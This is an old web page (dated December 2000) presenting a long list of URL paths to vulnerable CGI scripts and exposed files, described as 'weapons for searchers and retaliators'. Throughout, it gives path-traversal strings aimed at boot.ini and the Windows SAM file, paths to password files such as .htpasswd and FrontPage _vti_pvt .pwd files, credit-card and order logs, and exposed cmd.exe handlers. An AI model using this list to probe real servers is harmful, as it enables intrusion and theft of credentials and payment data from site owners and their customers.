A THIRD powerful "weak CGIs" list (December 2000) Courtesy of www.searchlores.org Incorrect use of these CGI scripts exposes the system hosting them to many vulnerabilities. Another list with quite a lot of -ahem- interesting WEAK CGIs... a treasure-chest of interesting weapons for searchers and retaliators alike. /....../ all /....../config.sys /....../etc/hosts /../../../../ all /../../../../../../../boot.ini /../../../../../winnt/repair/sam._ /../../../../config.sys /../../../../etc/hosts /.access /.bash_history /.htaccess /.html/............./config.sys /.htpasswd /.passwd /ASPSamp/AdvWorks/equipment/catalog_type.asp /Admin_files/order.log /AdvWorks/equipment/catalog_type.asp /Orders/order.log /PDG_Cart/order.log /PDG_Cart/shopper.conf /PSUser/PSCOErrPage.htm /WebShop/logs/cc.txt /WebShop/logs/ck.log /WebShop/templates/cc.txt /_private /_vti_bin/_vti_aut/dvwssr.dll /_vti_bin/fpcount.exe /_vti_inf.html /_vti_pvt /_vti_pvt/administrators.pwd /_vti_pvt/authors.pwd /_vti_pvt/service.pwd /_vti_pvt/shtml.dll /_vti_pvt/shtml.exe /_vti_pvt/users.pwd /adsamples/config/site.csc /bin /carbo.dll /ccbill/secure/ccbill.log /cfdocs/cfmlsyntaxcheck.cfm /cfdocs/exampleapp/docs/sourcewindow.cfm /cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini /cfdocs/expelval/displayopenedfile.cfm /cfdocs/expelval/exprcalc.cfm /cfdocs/expelval/openfile.cfm /cfdocs/expelval/sendmail.cfm /cfdocs/snippets/fileexists.cfm /cfdocs/snippets/viewexample.cfm /cgi /cgi-bin /cgi-bin/AT-admin.cgi /cgi-bin/AT-generate.cgi /cgi-bin/Admin_files/order.log /cgi-bin/AnyForm2 /cgi-bin/Cgitest.exe /cgi-bin/Count.cgi /cgi-bin/FormHandler.cgi /cgi-bin/GW5/GWWEB.EXE /cgi-bin/UltraBoard.cgi /cgi-bin/UltraBoard.pl /cgi-bin/add_ftp.cgi /cgi-bin/adp /cgi-bin/adpassword.txt /cgi-bin/ads.setup /cgi-bin/aglimpse /cgi-bin/alibaba.pl /cgi-bin/allmanage.pl /cgi-bin/allmanage/adp /cgi-bin/allmanage/k /cgi-bin/allmanage/settings.cfg /cgi-bin/allmanage/userfile.dat /cgi-bin/allmanageup.pl /cgi-bin/anyboard.cgi 
/cgi-bin/architext_query.pl /cgi-bin/authorize/dbmfiles/users /cgi-bin/ax-admin.cgi /cgi-bin/ax.cgi /cgi-bin/bigconf.cgi all /cgi-bin/bizdb1-search.cgi /cgi-bin/bnbform.cgi /cgi-bin/cachemgr.cgi /cgi-bin/calender.pl /cgi-bin/calender_admin.pl /cgi-bin/campas /cgi-bin/cart.pl /cgi-bin/cgiwrap /cgi-bin/classifieds.cgi /cgi-bin/clickresponder.pl /cgi-bin/cmd.exe /cgi-bin/counterfiglet /cgi-bin/dbmlparser.exe /cgi-bin/dig.cgi /cgi-bin/dnewsweb /cgi-bin/edit.pl /cgi-bin/environ.cgi /cgi-bin/excite /cgi-bin/faxsurvey /cgi-bin/filemail.pl /cgi-bin/files.pl /cgi-bin/finger /cgi-bin/finger.pl /cgi-bin/formmail.pl /cgi-bin/fpcount.exe /cgi-bin/fpexplore.exe /cgi-bin/gH.cgi /cgi-bin/get32.exe /cgi-bin/glimpse /cgi-bin/guestbook.cgi /cgi-bin/handler /cgi-bin/htimage.exe /cgi-bin/htmlscript /cgi-bin/htsearch /cgi-bin/htsearch /cgi-bin/iisadmpwd/achg.htr /cgi-bin/iisadmpwd/aexp.htr /cgi-bin/iisadmpwd/aexp2.htr /cgi-bin/iisadmpwd/anot.htr /cgi-bin/imagemap.exe /cgi-bin/info2www /cgi-bin/infosrch.cgi /cgi-bin/input.bat /cgi-bin/input2.bat /cgi-bin/jj /cgi-bin/k /cgi-bin/loadpage.cgi /cgi-bin/mailform.exe /cgi-bin/maillist.pl /cgi-bin/makechanges/easysteps/easysteps.pl /cgi-bin/man.sh /cgi-bin/netstat /cgi-bin/nph-publish /cgi-bin/nph-test-cgi /cgi-bin/passwd /cgi-bin/passwd.txt /cgi-bin/perl.exe /cgi-bin/perlshop.cgi /cgi-bin/pfdispaly.cgi /cgi-bin/pfdisplay /cgi-bin/pfdisplay.cgi /cgi-bin/phf /cgi-bin/php.cgi /cgi-bin/plusmail /cgi-bin/postcard.pl /cgi-bin/printenv /cgi-bin/process_bug.cgi /cgi-bin/query /cgi-bin/responder /cgi-bin/rguest.exe /cgi-bin/rpm_query /cgi-bin/rwwwshell.pl /cgi-bin/search.cgi /cgi-bin/settings.cfg /cgi-bin/sojourn /cgi-bin/survey.cgi /cgi-bin/test-cgi /cgi-bin/test.bat /cgi-bin/textcounter.pl /cgi-bin/tpgnrock /cgi-bin/tst.bat /cgi-bin/tst.bat /cgi-bin/unlg1.1 /cgi-bin/unlg1.2 /cgi-bin/userfile.dat /cgi-bin/view-source /cgi-bin/visadmin.exe /cgi-bin/w3-msql/ /cgi-bin/webbbs.cgi /cgi-bin/webdist.cgi /cgi-bin/webplus /cgi-bin/websendmail 
/cgi-bin/webwho.pl /cgi-bin/wguest.exe /cgi-bin/whois_raw.cgi /cgi-bin/windmail.exe /cgi-bin/wrap /cgi-bin/www-sql /cgi-bin/wwwadmin.pl /cgi-bin/wwwboard.pl /cgi-dos/args.bat /cgi-dos/args.cmd /cgi-local /cgi-shl/win-c-sample.exe /cgi-src /cgi-src/phf.c /cgi-win /cgi-win/uploader.exe /cgibin /com1 /com2 /com3 /com4 /con/con /config/checks.txt /config/import.txt /config/mountain.cfg /config/orders.txt /default.asp. /default.asp::$DATA /doc /iisadmpwd/aexp2.htr /iishelp/iis/misc/iirturnh.htw /iissamples/exair/howitworks/codebrws.asp /iissamples/exair/search/advsearch.asp /iissamples/exair/search/qfullhit.htw /iissamples/exair/search/qsumrhit.htw /iissamples/iissamples/query.asp /iissamples/issamples/oop/qfullhit.htw /iissamples/issamples/oop/qsumrhit.htw /iissamples/sdk/asp/docs/codebrws.asp /log /logs /mall_log_files/order.log /manage/cgi/cgiproc /msadc/Samples/SELECTOR/showcode.asp /msadc/msadcs.dll /msads/Samples/SELECTOR/showcode.asp /ncl_items.html /order/order.log /orders/checks.txt /orders/import.txt /orders/mountain.cfg /orders/order.log /orders/orders.txt /ping all /ping?SomeCrapHere /piranha/secure/passwd.php3 /pw/storemgr.pw /quikstore.cfg /samples/search/queryhit.htm /scripts /scripts/CGImail.exe /scripts/c32web.exe/ChangeAdminPassword /scripts/cart32.exe/cart32clientlist /scripts/cmd.exe /scripts/convert.bas /scripts/counter.exe /scripts/dbman/db.cgi?db=invalid-db /scripts/emurl/RECMAN.dll /scripts/fpcount.exe /scripts/iisadmin/ism.dll?http/dir /scripts/issadmin/bdir.htr /scripts/no-such-file.pl /scripts/proxy/w3proxy.dll /scripts/slxweb.dll /scripts/tools/mkilog.exe /scripts/tools/newdsn.exe /scripts/uploadn.asp /scripts/wa.exe /scripts/webbbs.exe /scripts/wsisa.dll /search97.vts /server-status /showfile.asp /ssi/envout.bat /ws_ftp.ini /~ /~bin /~guest /~log /~logs /~lp /~named /~root /~test /~tmp Good luck, good hunt!